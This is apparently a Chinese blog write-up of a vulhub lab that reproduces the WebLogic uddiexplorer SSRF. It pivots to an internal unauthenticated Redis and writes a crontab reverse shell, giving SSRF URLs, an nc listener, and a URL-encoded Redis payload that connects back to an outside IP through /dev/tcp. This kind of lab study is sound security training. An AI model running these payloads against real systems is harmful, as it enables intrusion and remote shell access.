vulhub weblogic ssrf复现

最新推荐文章于 2024-04-29 09:38:47 发布
最新推荐文章于 2024-04-29 09:38:47 发布
阅读量329 收藏
点赞数
分类专栏: SSRF 靶场 文章标签: 渗透测试 web安全 weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/122076917
版权

VPS:x.x.x.x
跳板机debian:192.168.130.129 weblogic
内网ubuntu:192.168.130.132 redis

1、operator参数可以调用外部url,由于未做限制,造成ssrf,可以借助它探测服务器端口,如下两种不同的报错
http://192.168.130.129:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

http://192.168.130.129:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:3389

2、通过ssrf探测内网主机,发现内网主机192.168.130.132开启6379且存在redis未授权,可以通过http的get请求写入shell

为什么get请求能写shell

1、redis未授权
2、redis通过换行符(\r\n)来分隔命令
3、目标主机开启定时任务

3、VPS监听6666端口
root@iZbp1h497hkijddeblcm8jZ:~# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)

4、get写定时任务 shell /etc/crontab

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/VPS:ip/6666 0>&1'\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

命令之间用\r\n分隔,url编码%0D%0A,全部url编码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F47.97.50.242%2F6666%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A

5、传参,反弹shell

遇到的坑

1.定时任务不一定会执行
2.不同系统定时任务目录不一样
/etc/crontab #大部分linux
/etc/cron.d/ #ubuntu
/var/spool/cron/root #centOS
/var/spool/cron/crontabs/root #debian
3.不太理解README里的shell最后为啥要加个aaa

Redredredfish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-14882​&14883:Weblogic RCE1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
WebLogic SSRF 及漏洞修
11-25
WebLogic SSRF 及漏洞修方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
weblogic12C 安装包
12-09
weblogic12C安装包 fmw_12.2.1.2.0_wls_Disk1_1of1.zip
【日常记录】一文解决vulhub,docker的安装和使用
人间体佐菲的博客
09-11 684
vulhub,docker安装使用
Weblogic-SSRF漏洞
wodepzw的博客
12-11 459
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001 我们访问的IP是内网ip地址,一般是拒绝访问的 当我们访问一个不存在的端口时,比如 http://127.0.0.1:7000 将会返回:co...
漏洞-vulhubWeblogicSSRF漏洞
sweetie 的博客
05-08 1421
模拟WeblogicSSRF漏洞实验: 1.打开搭建好vulhub的虚拟机,输入su切换到root用户 如果不切换,则会报下面的错 2、进入到vulhubweblogic/ssrf/中用gedit打开靶场说明书README.md ls gedit README.md 3、使用docker-compose up -d命令打开靶场,制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 4、用ifconfig或ip addr
vulhubweblogic ssrf漏洞
weixin_53730939的博客
03-19 414
vulhubweblogic ssrf漏洞(详解)
[漏洞]Weblogic SSRF漏洞
wwxxee
05-20 569
Weblogic SSRF漏洞 环境:vulhub/weblogic/ssrf 漏洞点 http://192.168.17.134:7001/uddiexplorer/SearchPublicRegistries.jsp 通过抓包发: 将此处替换为其他的地址可以有不同的回显。 例如: http://127.0.0.1:7001 回显: weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://1
weblogic 类加载
07-20
详细描述weblogic类加载机制及过程
SSRF——weblogic vulhub 漏洞及内网redis反弹shell
weixin_43774222的博客
03-17 6391
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实
漏洞——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 756
vulhubssrf漏洞
漏洞篇——利用vulhub模拟WeblogicSSRF漏洞
爱国小白帽
01-15 3134
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
weblogic ssrf漏洞
qq_38415434的博客
08-07 312
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中, cd /vulhub/weblogic/ssrf 创建漏洞环境 docker-compose up -d 查看容器 docker ps 虚拟机地...
Weblogic SSRF漏洞
K_ShenH的博客
06-24 1045
Weblogic SSRF漏洞
网络安全之密码学技术
最新发布
缘友一世的博客
04-29 1301
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实的,使用128位的密钥和8个循环。
vulhub weblogic ssrf
08-31
要在vulhubWebLogicSSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值